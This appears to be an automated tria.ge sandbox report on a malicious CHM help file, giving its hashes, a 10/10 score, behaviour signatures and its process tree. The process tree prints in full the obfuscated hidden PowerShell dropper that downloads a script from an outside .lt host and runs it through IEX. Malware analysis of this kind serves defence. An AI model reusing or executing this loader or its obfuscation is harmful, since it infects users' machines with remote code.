Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
169s -
max time network
193s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
08/10/2023, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
QJA_2023.05-22_Q_16-25.chm
Resource
win7-20230831-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
QJA_2023.05-22_Q_16-25.chm
Resource
win10v2004-20230915-en
5 signatures
150 seconds
General
-
Target
QJA_2023.05-22_Q_16-25.chm
-
Size
11KB
-
MD5
5f36f1a3b78d286033a6dac8340446ee
-
SHA1
6659d0703128dc55bd9776f3fd909f301650ae10
-
SHA256
0a7186e481d3a29e2ff9b60e937e389ea0d2a69aa513f1fb2d66a000601482fb
-
SHA512
57b734d05a665996258885e4d7a3171e70b30195f65ada04e4487995dc1968266bff8b0f9931750e2894650e0fda98d4c879b21df0fed7aaf046512631f1c825
-
SSDEEP
96:APcU9sWLZI1rqc4MTz9XTeNq73QNQyd2HyNLqxOb4:APJ9O2M39XQqDIQuOy
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://tijunaitiene.lt/x99.txt
Signatures
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2416 powershell.exe Token: SeIncreaseQuotaPrivilege 2416 powershell.exe Token: SeSecurityPrivilege 2416 powershell.exe Token: SeTakeOwnershipPrivilege 2416 powershell.exe Token: SeLoadDriverPrivilege 2416 powershell.exe Token: SeSystemProfilePrivilege 2416 powershell.exe Token: SeSystemtimePrivilege 2416 powershell.exe Token: SeProfSingleProcessPrivilege 2416 powershell.exe Token: SeIncBasePriorityPrivilege 2416 powershell.exe Token: SeCreatePagefilePrivilege 2416 powershell.exe Token: SeBackupPrivilege 2416 powershell.exe Token: SeRestorePrivilege 2416 powershell.exe Token: SeShutdownPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeSystemEnvironmentPrivilege 2416 powershell.exe Token: SeRemoteShutdownPrivilege 2416 powershell.exe Token: SeUndockPrivilege 2416 powershell.exe Token: SeManageVolumePrivilege 2416 powershell.exe Token: 33 2416 powershell.exe Token: 34 2416 powershell.exe Token: 35 2416 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2252 hh.exe 2252 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2252 wrote to memory of 2416 2252 hh.exe 30 PID 2252 wrote to memory of 2416 2252 hh.exe 30 PID 2252 wrote to memory of 2416 2252 hh.exe 30
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\QJA_2023.05-22_Q_16-25.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://tijunaitiene.lt/x99.txt')|P2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-